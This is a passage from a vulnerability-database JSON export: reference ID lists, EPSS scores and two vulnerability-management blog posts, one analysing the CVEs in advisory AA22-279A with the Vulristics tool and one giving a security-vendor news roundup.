["TRELLIX:341471F990B5DC7BFF1C28F924F10E32", "TRELLIX:357BDB16F9C97C350D8CFF381DE2C04E", "TRELLIX:39F5630F37B0A70500113404A73FE414", "TRELLIX:3D1BFD2AFBB082262FACCCAE2137672E", "TRELLIX:7B9C31B3E2F1A079101A700230D5A5C0", "TRELLIX:908157CFA8050AA23921170E873187E1", "TRELLIX:C3BC4A8730F3B1E4C9A82C07C31138D4", "TRELLIX:C68274BBC4E0B3B7EFA9290A8C6AA6C2", "TRELLIX:CC89DE5CDC16462BF1BBC90EE93DEE24", "TRELLIX:D57FEAD5DBF6D915430C791AC26C10CC", "TRELLIX:ED6978182DFD9CD1EA1E539B1EDABE6C"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:1333714193E63A3E616DE66054C5D640", "TRENDMICROBLOG:3981EF309A794B1CC15F5BBC6C2B181B", "TRENDMICROBLOG:608F794950B54766A75ABA93823701D0", "TRENDMICROBLOG:71352D2908FCBB1B73386712067E79E8", "TRENDMICROBLOG:B2CE0B51EC84664ADCCD67A2A0DF7033", "TRENDMICROBLOG:C00F7F935E0D1EAD0509B4C376B20A1F", "TRENDMICROBLOG:C927C873A9E9A7AF6B74D64EFAFA6B02"]}, {"type": "typo3", "idList": ["TYPO3-PSA-2021-004"]}, {"type": "ubuntu", "idList": ["USN-5192-1", "USN-5192-2", "USN-5197-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-22205", "UB:CVE-2021-4104", "UB:CVE-2021-41773", "UB:CVE-2021-42013", "UB:CVE-2021-44228", "UB:CVE-2021-45046", "UB:CVE-2022-26134"]}, {"type": "veeam", "idList": ["VEEAM:KB4254"]}, {"type": "veracode", "idList": ["VERACODE:32397", "VERACODE:32442", "VERACODE:33244", "VERACODE:33337", "VERACODE:33348", "VERACODE:42295"]}, {"type": "vmware", "idList": ["VMSA-2021-0020", "VMSA-2021-0020.1", "VMSA-2021-0028.1", "VMSA-2021-0028.10", "VMSA-2021-0028.11", "VMSA-2021-0028.12", "VMSA-2021-0028.13", "VMSA-2021-0028.2", "VMSA-2021-0028.3", "VMSA-2021-0028.4", "VMSA-2021-0028.6", "VMSA-2021-0028.7", "VMSA-2021-0028.8", "VMSA-2021-0028.9"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:060FBB90648BCDE11554492408AE89C8", "WALLARMLAB:1493380EEC54B493CC22B4FA116139BB", "WALLARMLAB:2AAA5E62EED6807B93FB40361B4927CB", "WALLARMLAB:6D3FED0879553B4C47AD26ED1DEB5AEB", "WALLARMLAB:90D3FFE69FF928689D36310EF8B1C4F3", "WALLARMLAB:A49A7EF6D6A0472E58CBD619282C9FE0", "WALLARMLAB:BED32468D036C4C2D5DC502940814368", "WALLARMLAB:C5940EBF622709A929825B8B12592EF5", "WALLARMLAB:E69ED97E0B27F68EA2CE3BB7BA9FE681", "WALLARMLAB:E86F01AF50087BEB03AAB46947CDE884"]}, {"type": "wordfence", "idList": ["WORDFENCE:107445D672F037011ADA9A0DA9FB8292", "WORDFENCE:45390D67D024DD8C963E18DAE88303B2"]}, {"type": "zdt", "idList": ["1337DAY-ID-33140", "1337DAY-ID-33794", "1337DAY-ID-33806", "1337DAY-ID-33824", "1337DAY-ID-34646", "1337DAY-ID-34647", "1337DAY-ID-34652", "1337DAY-ID-34748", "1337DAY-ID-35944", "1337DAY-ID-36024", "1337DAY-ID-36262", "1337DAY-ID-36281", "1337DAY-ID-36357", "1337DAY-ID-36694", "1337DAY-ID-36730", "1337DAY-ID-36854", "1337DAY-ID-36874", "1337DAY-ID-36897", "1337DAY-ID-36933", "1337DAY-ID-36937", "1337DAY-ID-36952", "1337DAY-ID-36997", "1337DAY-ID-37030", "1337DAY-ID-37051", "1337DAY-ID-37056", "1337DAY-ID-37080", "1337DAY-ID-37135", "1337DAY-ID-37136", "1337DAY-ID-37228", "1337DAY-ID-37257", "1337DAY-ID-37264", "1337DAY-ID-37431", "1337DAY-ID-37456", "1337DAY-ID-37496", "1337DAY-ID-37777", "1337DAY-ID-37778", "1337DAY-ID-37781", "1337DAY-ID-37783", "1337DAY-ID-37889", "1337DAY-ID-38098", "1337DAY-ID-38189", "1337DAY-ID-38193", "1337DAY-ID-38195", "1337DAY-ID-38421"]}]}, "score": {"value": 11.3, "vector": "NONE"}, "epss": [{"cve": "CVE-2019-11510", "epss": 0.97517, "percentile": 0.99972, "modified": "2023-05-02"}, {"cve": "CVE-2019-19781", "epss": 0.975, "percentile": 0.99956, "modified": "2023-05-02"}, {"cve": "CVE-2020-5902", "epss": 0.97562, "percentile": 0.99995, "modified": "2023-05-01"}, {"cve": "CVE-2021-1497", "epss": 0.97499, "percentile": 0.99956, "modified": "2023-05-01"}, {"cve": "CVE-2021-20090", "epss": 0.97446, "percentile": 0.99904, "modified": "2023-05-01"}, {"cve": "CVE-2021-22005", "epss": 0.97429, "percentile": 0.99885, "modified": "2023-05-02"}, {"cve": "CVE-2021-22205", "epss": 0.97393, "percentile": 0.99848, "modified": "2023-05-01"}, {"cve": "CVE-2021-26084", "epss": 0.97475, "percentile": 0.99938, "modified": "2023-05-01"}, {"cve": "CVE-2021-26412", "epss": 0.01825, "percentile": 0.86433, "modified": "2023-05-01"}, {"cve": "CVE-2021-26854", "epss": 0.01825, "percentile": 0.86433, "modified": "2023-05-01"}, {"cve": "CVE-2021-26855", "epss": 0.97532, "percentile": 0.99982, "modified": "2023-05-01"}, {"cve": "CVE-2021-26857", "epss": 0.07213, "percentile": 0.92995, "modified": "2023-05-01"}, {"cve": "CVE-2021-26858", "epss": 0.11092, "percentile": 0.94264, "modified": "2023-05-01"}, {"cve": "CVE-2021-27065", "epss": 0.95076, "percentile": 0.98886, "modified": "2023-05-01"}, {"cve": "CVE-2021-27078", "epss": 0.01825, "percentile": 0.86433, "modified": "2023-05-01"}, {"cve": "CVE-2021-36260", "epss": 0.97479, "percentile": 0.99942, "modified": "2023-05-02"}, {"cve": "CVE-2021-40539", "epss": 0.97508, "percentile": 0.99968, "modified": "2023-05-02"}, {"cve": "CVE-2021-41773", "epss": 0.97524, "percentile": 0.99976, "modified": "2023-05-02"}, {"cve": "CVE-2021-42013", "epss": 0.97519, "percentile": 0.99974, "modified": "2023-05-02"}, {"cve": "CVE-2021-42237", "epss": 0.97546, "percentile": 0.99991, "modified": "2023-05-02"}, {"cve": "CVE-2021-44228", "epss": 0.97581, "percentile": 0.99999, "modified": "2023-05-02"}, {"cve": "CVE-2022-1388", "epss": 0.97489, "percentile": 0.99947, "modified": "2023-05-02"}, {"cve": "CVE-2022-24112", "epss": 0.97146, "percentile": 0.99642, "modified": "2023-05-02"}, {"cve": "CVE-2022-26134", "epss": 0.97542, "percentile": 0.99988, "modified": "2023-05-02"}], "vulnersScore": 11.3}, "_state": {"dependencies": 1694293075, "score": 1694293246, "epss": 0}, "_internal": {"score_hash": "4768ccb0580d4505e179f1f89afc0dcc"}}
{"avleonov": [{"lastseen": "2023-04-23T15:50:43", "description": "Hello everyone! This episode will be about the new hot twenty vulnerabilities from CISA, NSA and FBI, [Joint cybersecurity advisory (CSA) AA22-279A](<https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF>), and how I analyzed these vulnerabilities using my open source project [Vulristics](<https://github.com/leonov-av/vulristics>). \n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239105>\n\nAmericans can't just release a list of "20 vulnerabilities most commonly exploited in attacks on American organizations." They like to add geopolitics and point the finger at some country. Therefore, I leave the attack attribution mentioned in the advisory title without comment.\n\nBut I like such lists of vulnerabilities for a number of reasons:\n\n * Such lists of **vulnerabilities** show which CVEs need to be addressed. This is the most obvious. If you notice vulnerabilities from the list in your infrastructure, start fixing them as soon as possible.\n * Such lists of vulnerabilities show the **software and hardware products** that are most important to monitor. This means that your vulnerability scanner must support this software very well. Make sure you can verify this.\n * Such lists of vulnerabilities show **groups of software and hardware products **that need to be monitored first. Usually these are products that are available to a wide range of users and are inconvenient to upgrade.\n * Such lists of vulnerabilities show **the types of vulnerabilities** that you need to pay attention to first.\n * Such lists of vulnerabilities are relatively compact and **can be easily analyzed** even manually.\n\nI can't help but notice that the quality of the advisory is not very high. For example, the description of vulnerabilities was automatically taken from NVD. Including this: \n\n"Microsoft Exchange Server remote code execution vulnerability. This CVE ID differs from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078". \n\nNot very informative, right? This joint advisory was released by three big serious organizations. They could work harder and write a unique text for each of the 20 CVEs. But no one seems to care.\n\nHere is a list of all vulnerabilities from the advisory:\n\n 1. Apache Log4j CVE-2021-44228 Remote Code Execution\n 2. Pulse Connect Secure CVE-2019-11510 Arbitrary File Read\n 3. GitLab CE/EE CVE-2021-22205 Remote Code Execution\n 4. Atlassian CVE-2022-26134 Remote Code Execution\n 5. Microsoft Exchange CVE-2021-26855 Remote Code Execution\n 6. F5 Big-IP CVE-2020-5902 Remote Code Execution\n 7. VMware vCenter Server CVE-2021-22005 Arbitrary File Upload\n 8. Citrix ADC CVE-2019-19781 Path Traversal\n 9. Cisco Hyperflex CVE-2021-1497 Command Line Execution\n 10. Buffalo WSR CVE-2021-20090 Relative Path Traversal\n 11. Atlassian Confluence Server and Data Center CVE-2021-26084 Remote Code Execution\n 12. Hikvision Webserver CVE-2021-36260 Command Injection\n 13. Sitecore XP CVE-2021-42237 Remote Code Execution\n 14. F5 Big-IP CVE-2022-1388 Remote Code Execution\n 15. Apache CVE-2022-24112 Authentication Bypass by Spoofing\n 16. ZOHO CVE-2021-40539 Remote Code Execution\n 17. Microsoft CVE-2021-26857 Remote Code Execution\n 18. Microsoft CVE-2021-26858 Remote Code Execution\n 19. Microsoft CVE-2021-27065 Remote Code Execution\n 20. Apache HTTP Server CVE-2021-41773 Path Traversal\n\nOf course, I did not deny myself the pleasure of using this list of CVEs as input for my [Vulristics vulnerability prioritization tool](<https://github.com/leonov-av/vulristics>). Just to see how Vulristics handles it and tweak Vulristics if needed.\n\nHere is the command I used to generate the report:\n \n \n $ python3.8 vulristics.py --report-type \"cve_list\" --cve-project-name \"AA22-279A\" --cve-list-path joint_cves.txt --cve-data-sources \"ms,nvd,vulners,attackerkb\" --cve-comments-path comments.txt --rewrite-flag \"True\"\n\nThe full report is here: <https://avleonov.com/vulristics_reports/aa22-279a_report_with_comments_ext_img.html>\n\n## Vulnerable Products\n\nIf you look at the list of vulnerable software and hardware products, then some of them, obviously, should have been included in this advisory. Because lately there have been a lot of publications about how attackers exploit the vulnerabilities in these products:\n\n * Apache HTTP Server\n * Apache Log4j2\n * GitLab\n * Microsoft Exchange\n * Confluence Server\n * Zoho ManageEngine ADSelfService Plus\n * Pulse Connect Secure\n\nThe second group of products. For them, there were also publications about attacks. But it seems that these are more niche products and are less perceived as targets for attackers:\n\n * BIG-IP\n * Citrix Application Delivery Controller\n * VMware vCenter\n * Cisco HyperFlex HX\n\nAnd finally, there are quite exotic products that apparently reflect the specifics of American IT:\n\n * Sitecore Experience Platform (XP)\n * Hikvision Web Server\n * Apache APISIX\n * Buffalo WSR\n\n## Criticality of Vulnerabilities\n\nVulristics has identified all vulnerabilities as vulnerabilities of the highest criticality level (Urgent). Vulristics found public exploits for all vulnerabilities.\n\nAt the same time, if you look at CVSS, then there is this:\n\nAll vulnerabilities: 20 \nCritical: 16 \nHigh: 4 \nMedium: 0 \nLow: 0\n\nSo if you are using CVSS for prioritization, don't forget about the High level vulnerabilities.\n\n## Detected Types of Vulnerabilities\n\n * Remote Code Execution\n * Command Injection\n * Arbitrary File Reading\n * Authentication Bypass\n * Path Traversal\n\nAs we can see, all vulnerabilities are obviously critical except for one "Path Traversal":\n\nPath Traversal - Citrix Application Delivery Controller (CVE-2019-19781)\n\nThe description of the vulnerability leaves no room for detecting another type:\n\n"An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal".\n\nThe same type is indicated in the advisory AA22-279A: Citrix ADC CVE-2019-19781 Path Traversal\n\nAnd only [in the description of the exploit](<https://github.com/trustedsec/cve-2019-19781>) we can see that this is in fact RCE: "This tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used to append files in an XML format to the victim machine. This in turn allows for **remote code execution**."\n\nWell, this is another reminder to us that we should not do hard filtering by vulnerability type. It's also not a good idea to trust the description from NVD. The type of vulnerability may change over time, and no one will make changes to the description in NVD.\n\nIn some cases, Vulristics can help to more accurately determine the type of vulnerability:\n\nAA22-279A: Apache HTTP Server CVE-2021-41773 Path Traversal \nVulristics: Remote Code Execution - Apache HTTP Server (CVE-2021-41773)\n\nWhy? Because we can read in the description: "If CGI scripts are also enabled for these aliased pathes, this could allow for **remote code execution**."\n\nBut of course Vulristics is not a silver bullet. It is difficult to come up with something here other than manual analysis of publications about vulnerabilities and exploits.\n\nI also cannot help but point out that for some of the vulnerabilities, Vulrisitcs determined the types of vulnerabilities more correctly in accordance with the description:\n\nAA22-279A: GitLab CE/EE CVE-2021-22205 Remote Code Execution \nVulristics: Command Injection - GitLab (CVE-2021-22205) - Urgent [947] \n"\u2026 which resulted in a **remote command execution**."\n\nAA22-279A: Sitecore XP CVE-2021-42237 Remote Code Execution \nVulristics: Command Injection - Sitecore Experience Platform (XP) (CVE-2021-42237) \n"\u2026 it is possible to achieve **remote command execution** on the machine."\n\nAA22-279A: VMware vCenter Server CVE-2021-22005 Arbitrary File Upload \nVulristics: Remote Code Execution - VMware vCenter (CVE-2021-22005) \n"\u2026may exploit this issue **to execute code** on vCenter Server by uploading a specially crafted file."\n\nAA22-279A: F5 Big-IP CVE-2022-1388 Remote Code Execution \nVulristics: Authentication Bypass - BIG-IP (CVE-2022-1388) \n\u2026 undisclosed requests **may bypass** iControl REST **authentication**"\n\nAA22-279A: Apache HTTP Server CVE-2021-41773 Path Traversal \nVulristics: Remote Code Execution - Apache HTTP Server (CVE-2021-41773) \n"\u2026 this could allow for **remote code execution**."\n\nAA22-279A: Apache CVE-2022-24112 Authentication Bypass by Spoofing \nVulristics: Remote Code Execution - Apache APISIX (CVE-2022-24112) \n"\u2026 is vulnerable to **remote code execution**."\n\nAA22-279A: Buffalo WSR CVE-2021-20090 Relative Path Traversal \nVulristics: Authentication Bypass - Buffalo WSR (CVE-2021-20090) \n"\u2026 allow unauthenticated remote attackers to **bypass authentication**."\n\nTherefore, do not rush to trust the vulnerability type from the [CISA Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) and take it into account when prioritizing vulnerabilities.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-21T20:10:13", "type": "avleonov", "title": "Joint Advisory AA22-279A and Vulristics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2021-1497", "CVE-2021-20090", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-26084", "CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078", "CVE-2021-36260", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-24112", "CVE-2022-26134"], "modified": "2022-10-21T20:10:13", "id": "AVLEONOV:FEA9E4494A95F04BD598867C8CA5D246", "href": "https://avleonov.com/2022/10/21/joint-advisory-aa22-279a-and-vulristics/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-14T16:51:25", "description": "Hello everyone! This is the second episode of Vulnerability Management news and publications. In fact, this is a collection of my posts from the [avleonovcom](<https://t.me/avleonovcom>) and [avleonovrus](<https://t.me/avleonovrus>) telegram channels. Therefore, if you want to read them earlier, subscribe to these channels.\n\n_The main idea of \u200b\u200bthis episode. Microsoft is a biased company. In fact, they should now be perceived as another US agency. Does this mean that we need to forget about Microsoft and stop tracking what they do? No, it doesn't. They do a lot of interesting things that can at least be researched and copied. Does this mean that we need to stop using Microsoft products? In some locations (you know which ones) for sure, in some we can continue to use such products if it is reasonable, but it's necessary to have a plan B. And this does not only apply to Microsoft. So, it's time for a flexible approaches. Here we do it this way, there we do it differently. It seems that rather severe fragmentation of the IT market is a long-term trend and it's necessary to adapt to it._\n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239097>\n\nWhat's in this episode:\n\n 1. Microsoft released a propaganda report, what does this mean for us?\n 2. Microsoft released the Autopatch feature, is it a good idea to use it?\n 3. Ridiculous Vulnerability: Hardcoded Password in Confluence Questions\n 4. The new Nessus Expert and why it's probably Tenable's worst release\n 5. Rapid7 Nexpose/InsightVM features added in Q2 2022: what's good and what's weird\n 6. Palo Alto: Malicious scan 15 minutes after CVE is released. Oh really?\n 7. 6 groups of vulnerabilities that are most often used in attacks, according to Palo Alto, and the end of IT globalization\n\n## Microsoft released a propaganda report, what does this mean for us?\n\nLet's start with the most important topic. Microsoft [released a propaganda report](<https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE50KOK>) about the evil Russians and how they (Microsoft) defend one well-known country. I usually avoid such topics, but in this case, I just can't.\n\n 1. Most of the report is "water" and unproven "highly-likely" stuff. It's boring to read. More than half of the report is not about cyber attacks at all, but about propaganda/disinformation "attacks" in media, social networks, etc. With strange historical digressions. For example, they give a photo of some article from an Indian newspaper of the 1980s and write that this publication was organized by the KGB. I'm not kidding, look at page 12.\n 2. On the other hand, the most important thing in this report is not what is written, but who released it. It's not mainstream media, it's not a government agency like the NSA or CIA, it's Microsoft - a global IT vendor that should, in theory, be more or less neutral. And now they are releasing such reports! If you still believe Microsoft is a non-government commercial company, look through this report. This position is the most official, the foreword was written by the current president of Microsoft.\n 3. From a technical point of view, it is interesting that the state IT infrastructure was transferred to the cloud and Microsoft technologies (Defender for Endpoint?) were used to protect it. Almost all technical information is on the 9th page of the report.\n 4. They write about 2 important security options. The first is that Microsoft made a free Vulnerability Management for them. "The first has been the use of technology acquired from RiskIQ that identifies and maps organizational attack surfaces, including devices that are unpatched against known vulnerabilities and therefore are the most susceptible to attack." It's not entirely clear how they did it. They could just connect hosts to Defender for Endpoint. But perhaps they massively activated the collection of data from hosts in some other way.\n 5. The description of the second protection option hints at the existence of a such non-standard methods: "MSTIC recognized that XXX malware could be mitigated meaningfully by turning on a feature in Microsoft Defender called controlled folder access. This typically would require that IT administrators access devices across their organization, work made more difficult and potentially even dangerous in ZZZ conditions. The YYY government therefore authorized Microsoft through special legal measures to act proactively and remotely to turn on this feature across devices throughout the government and across the country." And here it is not so important that Microsoft set up controlled folder access, it is important how they did it. It turns out that MS can massively remotely tweak security options if the government of a certain country has allowed them to do so. Wow! And what else can they do, on which hosts and under what conditions?\n 6. The main concern, of course, is that Microsoft products, including cloud-based security services, are still widely used in Russian organizations. And not only in Russia, but also in other countries that have some disagreements with US policy. Such publications confirm that Microsoft is a highly biased and unstable IT vendor, and something needs to be done about it quickly.\n\nAnd it would be fair to ask: "Weren't you, Alexander, promoting Microsoft's security services? And now you've turned against them?" \n\nAnd it's easy to point to some posts from my blog:\n\n 1. [Microsoft security solutions against ransomware and APT](<https://avleonov.com/2017/12/20/microsoft-security-solutions-against-ransomware-and-apt/>) (the best business breakfast I've ever had - the catering was top notch )\n 2. [Microsoft Defender for Endpoint: Why You May Need It and How to Export Hosts via API in Python](<https://avleonov.com/2021/02/19/microsoft-defender-for-endpoint-why-you-may-need-it-and-how-to-export-hosts-via-api-in-python/>)\n 3. [Getting Hosts from Microsoft Intune MDM using Python](<https://avleonov.com/2021/06/09/getting-hosts-from-microsoft-intune-mdm-using-python/>)\n 4. [How to get Antivirus-related Data from Microsoft Defender for Endpoint using Intune and Graph API](<https://avleonov.com/2021/08/16/how-to-get-antivirus-related-data-from-microsoft-defender-for-endpoint-using-intune-and-graph-api/>)\n 5. [Microsoft Defender for Endpoint: The Latest Versions of Antivirus Engine & Signatures](<https://avleonov.com/2021/09/14/microsoft-defender-for-endpoint-the-latest-versions-of-antivirus-engine-signatures/>)\n\nIt's paradoxical, but I don't have a post about exporting vulnerabilities from Defender for Endpoint.  I was going to make a post about it, but there were always more important topics. \n\nWhat can I say. I still think that Defender for Endpoint is a cool and user-friendly solution. Although sometimes it may be buggy. I also think it's logical to use your OS vendor's security services. Just because you already have complete trust in your OS vendor. Right? \u0410nd other OS vendors should provide security services, as Microsoft does. But the question is what to do if it has become very difficult to trust your OS vendor? To put it mildly.\n\nNot to say that I did not [write about such risks](<https://avleonov.com/2017/12/20/microsoft-security-solutions-against-ransomware-and-apt/>) at all:\n\n"It will be a difficult decision to store this critical data in Microsoft cloud. Even with Microsoft\u2019s guarantees that all the data is stored securely and they touch it with AI only."\n\nBut of course this was not enough. And 5 years ago, things looked very different. \n\u00af_(\u30c4)_/\u00af\n\n## Microsoft released the Autopatch feature, is it a good idea to use it?\n\nContinuing the topic of Microsoft security services. In mid-July, Microsoft [released the Autopatch feature](<https://www.bleepingcomputer.com/news/microsoft/microsoft-windows-autopatch-is-now-generally-available/>) for Windows 10/11 with Enterprise E3 and E5 licenses (not regular, but more expensive licenses). Also [Hybrid Azure Active Directory must be configured](<https://www.theregister.com/2022/07/12/windows_auopatch_live/>). But if everything is purchased and configured properly, then updates for MS products, drivers and other software (in perspective) can be automatically installed from the MS cloud. And it will be more often than once a month. And in the correct way. If you install all updates on all hosts at the same time, there will be a high risk of mass failures. Therefore, patches will be installed gradually. If a failure is detected, the system administrator will be able to react and roll back the problematic patch.\n\n"The 'test ring' contains a minimum number of devices, the 'first ring' roughly 1% of all endpoints in the corporate environment, the 'fast ring' around 9%, and the 'broad ring" the rest of 90% of devices. \nThe updates get deployed progressively, starting with the test ring and moving on to the larger sets of devices after a validation period that allows device performance monitoring and pre-update metrics comparison. \nWindows Autopatch also has built-in Halt and Rollback features that will block updates from being applied to higher test rings or automatically rolled back to help resolve update issues."\n\nIs it convenient? Yes, of course it's convenient. Is it dangerous? Well, it depends on trust in the vendor, faith in vendor's stability and security. Speaking of Microsoft, this can be very controversial for many organizations in many locations. \n\nBut in general, along with Defender for Endpoint (EDR, VM) and Intune this Autopatch feature looks like a step in the right direction for the OS vendor. At least if we're talking about desktops. If you trust your OS vendor, it makes sense to trust that vendor's services to make life easier for system administrators and security guys. I don't know if vendors of commercial Linux distributions, including Russian ones, are thinking about this, but it seems it makes sense to take such concepts from MS.\n\nOn the other hand, such Autopatch is not a panacea of course. Everything is not so trivial with updating third-party software. But MS seems to have a lot of resources to gradually move in this direction. Vulnerability detection for third-party software in Defender for Endpoint works quite well, which is also not an easy task. Therefore, I think they will be able to update such software in future. If [Qualys can](<https://www.qualys.com/company/newsroom/news-releases/usa/qualys-introduces-zero-touch-patching-for-vulnerability-remediation/>), then MS will handle this as well.\n\n## Ridiculous Vulnerability: Hardcoded Password in Confluence Questions\n\nThere has been a lot of news about [Confluence vulnerabilities](<https://confluence.atlassian.com/security/july-2022-atlassian-security-advisories-overview-1142446703.html>) this week. Atlassian has released three of them.\n\n[CVE-2022-26136 & CVE-2022-26137](<https://confluence.atlassian.com/security/multiple-products-security-advisory-cve-2022-26136-cve-2022-26137-1141493031.html>): Multiple Servlet Filter vulnerabilities (Authentication bypass, XSS, Cross-origin resource sharing bypass). Many Atlassian products are vulnerable. Not only Confluence and JIRA, but also Bitbucket for example. Everything is clear here, such installations need to be patched. And, ideally, it's time to stop using Atlassian products if you live and work in certain locations, because this vendor is unstable.\n\n[CVE-2022-26138](<https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html>): Hardcoded password in Confluence Questions. This vulnerability is now the most hyped and ridiculous. If you install the optional Confluence Questions app, this will create a disabledsystemuser user with a hardcoded password. And this user is not disabled!  The password is already publicly available. If you are logged in as this user, you can read the pages accessible by the confluence-users group. Well, isn't it funny?  This can be fixed by patching or blocking/deleting the user.\n\nWhat can be said here:\n\n 1. Plugins and extensions are evil and usually the most vulnerable. Try to avoid them.\n 2. This is how backdoors in software can look like. The exploitation is very simple, and the vendor can always say that "oh, sorry, that was a bug".\n 3. Those who make Confluence and similar services available on the network perimeter are their own enemies.\n\n## The new Nessus Expert and why it's probably Tenable's worst release\n\nTenable [introduced Nessus Expert](<https://www.tenable.com/blog/introducing-nessus-expert-now-built-for-the-modern-attack-surface>). They have Nessus Professional, and now there will be Nessus Expert with new features:\n\n 1. [Infrastructure as Code Scanning](<https://youtu.be/Ks5XN0ZpzBw>). In fact, they added [Terrascan](<https://runterrascan.io/>) (acquired this year) to Nessus. So far, it looks very sloppy. This is a separate independent tab in the menu and scan results cannot be viewed in the GUI and can only be downloaded as Json file.\n 2. [External attack surface scanning](<https://youtu.be/_TYvN_GS-AA>). They took these features from [Bit Discovery](<https://www.whitehatsec.com/bit-discovery/>) (also acquired this year). You can run a scan that will look for subdomains for a domain. But only for 5 domains per quarter. If you want more, you need to pay extra. Not to say that this is some kind of exclusive feature. The results can be viewed in the GUI. But that's all. There is no synergy with the usual functionality of Nessus.\n\nThe press release recalls how [Renaud Deraison](<https://t.me/avleonovcom/966>) released first Nessus 24 years ago. But under him, and even more so under Ron Gula, there were no such terrible releases with freshly bought functionality, attached to the main product "with blue electrical tape". And such a Frankenstein monster could never be presented as a new product. Sadness and marketing. Let's see if it gets better with time.\n\n## Rapid7 Nexpose/InsightVM features added in Q2 2022: what's good and what's weird\n\nI looked at the new features in [Rapid7 Nexpose/InsightVM added in Q2 2022](<https://www.rapid7.com/blog/post/2022/07/28/whats-new-in-insightvm-and-nexpose-q2-2022-in-review/>). Some changes are like "OMG, how did they live without it?!"\n\nThey just added support for CVSS v3 severity in dashboards. CVSS v3 was released in June 2015. CVSS v3 data has been available in NVD since 2017. And now, 5 years after that, Rapid7 decided to take into account these data as well? Well, ok.\n\nOr that they used to have such weird patching dashboards that progress on the Remediation Project was only visible when the patches were applied to all assets. And now it's better: "Yes, this means customers no longer have to wait for all the affected assets to be remediated to see progress". Indeed, better late than never.\n\nRapid7 just added support for AlmaLinux and Rocky Linux. Although stable versions of these distributions appeared more than a year ago and are already actively used in enterprise businesses as a replacement for CentOS. It turns out that Rapid7 clients have just now got the opportunity to scan these distributions.\n\nRapid7 use the term "recurring coverage" for supported software products. And they have a [public list of such products](<https://docs.rapid7.com/insightvm/recurring-vulnerability-coverage/>). "The following software list encompasses those products and services that we are specifically committed to providing ongoing, automated coverage". The list is not very big, but it's cool that it's public.\n\nOn the other hand, there are cool features. At least one, [Scan Assistant](<https://docs.rapid7.com/insightvm/scan-assistant/>). This feature was introduced in December last year, but now it has been improved. This is an agent that does not collect or analyze data, but is only needed for authentication. It solves the problems of using system accounts for scanning, which can be very risky if the scanner host or one of the targets is compromised. This way you can install Scan Assistant on hosts and Vulnerability Scanner will authenticate to hosts using certificates rather than real system accounts.\n\n"Scan Assistant, a lightweight service deployed on an asset that uses digital certificates for handshake instead of account-based credentials; This alleviates the credential management headaches VM teams often encounter."\n\nThis is a cool and useful feature. As far as I know, other VM vendors do not have this. In Q2, Rapid7 added some automation for updating this Scan Assistant and rotating certificates. It's cool that the functionality is evolving. But for now, it's only for Windows.\n\nAnd there are updates that did not cause any special emotions in me. These are, for example, Asset correlation for Citrix VDI instances and vulnerability detection for Oracle E-Business Suite and VMware Horizon. They added and it's good.\n\n## **Palo Alto: Malicious scan 15 minutes after CVE is released. Oh really?**\n\nThe ["Palo Alto 2022 Unit 42 Incident Response Report" makes the amusing claim](<https://unit42.paloaltonetworks.com/incident-response-report/>) that attackers typically start scanning organizations' perimeters for vulnerabilities 15 minutes after a CVE is published.\n\nJust like this:\n\n"The 2021 Attack Surface Management Threat Report found that attackers typically start scanning for vulnerabilities within 15 minutes of a CVE being announced."\n\nThey do not write how exactly they got these 15 minutes. Or I didn't find it. But apparently they could detect attempts to exploit some specific vulnerabilities. They could use honeypots or IDS for this. And then they could get the difference between the timestamp for exploitaition and the timestamp for vulnerability publication.\n\n[There is an example](<https://unit42.paloaltonetworks.com/cve-2022-1388/>) that 5 days after some vulnerability was published, they released a detection signature. And in 10 hours, they collected two and a half thousand attempts to exploit this vulnerability.\n\n"For example, Palo Alto Networks released a Threat Prevention signature for the F5 BIG-IP Authentication Bypass Vulnerability (CVE-2022-1388), and within just 10 hours, the signature triggered 2,552 times due to vulnerability scanning and active exploitation attempts".\n\nIt's cool of course. But still, the signature was not released immediately. Therefore, it is difficult to say exactly when the malicious scans began.\n\nBut that's not the point. It is not so important whether the scans really start after 15 minutes or some time later. The fact is that attackers monitor the news flow about vulnerabilities. And the fact that they are motivated to scan your perimeter more often than you. And they are motivated to use non-standard checks for this. Not just the ones in your commercial vulnerability scanner.\n\nTherefore, there are only two options. You can 